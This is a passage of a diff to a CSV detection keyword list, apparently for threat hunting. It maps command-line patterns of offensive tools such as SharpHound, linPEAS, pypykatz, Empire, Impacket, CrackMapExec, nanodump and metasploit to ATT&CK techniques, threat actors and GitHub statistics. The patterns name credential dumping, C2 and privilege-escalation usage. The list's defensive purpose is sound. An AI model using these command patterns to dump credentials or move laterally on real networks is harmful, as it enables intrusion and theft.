Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --ldapusername * --ldappassword *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"* --ldapusername * --ldappassword *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "* ldeep_dump *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" "* lexmark-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* linpeas.sh *","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"* linpeas.sh *","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "* linpeas.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -linpeas=http://127.0.0.1/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"* linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --list=hidden-options*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -linpeas=http://127.0.0.1/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"* linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --list=hidden-options*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* --list-payloads*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* live dpapi blobfile *.blob*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* live dpapi cred *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" 
@@ -1164,13 +1164,13 @@ "* live smbapi share enum*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* live users whoami*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* llmnr-resolve.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -LLMNRTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -LLMNRTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -llmnrtypes AAAA*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "* lltd-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --llvm-obfuscator * ","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" -"* LMHASH:NTHASH*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -LNKPath * -EncScript *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BackdoorLNK.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* load_extra_pots*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* LMHASH:NTHASH*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -LNKPath * -EncScript *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BackdoorLNK.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* load_extra_pots*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* --load-dll *ssp.dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "* --load-shellcode *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* local class-instances SMS_Authority*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" 
@@ -1179,11 +1179,11 @@ "* local query * FROM SMS_Authority*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* local secrets -m disk*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* local secrets -m wmi*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" -"* --local-auth --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -LocalPoshC2ProjectDir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* -LocalPoshC2ProjectDir 
*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* -lockless -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* --loggedon-users*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --local-auth --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -LocalPoshC2ProjectDir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -LocalPoshC2ProjectDir *","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -lockless -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --loggedon-users*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* --lport 1337 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* LPORT=4444*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* lsa minidump * -o 